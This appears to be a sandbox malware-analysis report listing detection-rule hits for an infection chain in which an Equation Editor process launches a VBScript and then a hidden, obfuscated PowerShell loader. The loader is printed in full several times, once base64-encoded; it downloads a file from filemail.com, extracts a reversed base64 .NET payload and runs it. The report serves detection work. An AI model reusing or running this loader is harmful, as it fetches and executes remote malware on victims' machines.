      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]:
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]:
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAb
      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3820, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , ProcessId: 3764, ProcessName: wscript.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , ProcessId: 3764, ProcessName: wscript.exe
      Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 3764, TargetFilename: C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAb
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3820, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" , ProcessId: 3764, ProcessName: wscript.exe
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAb
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
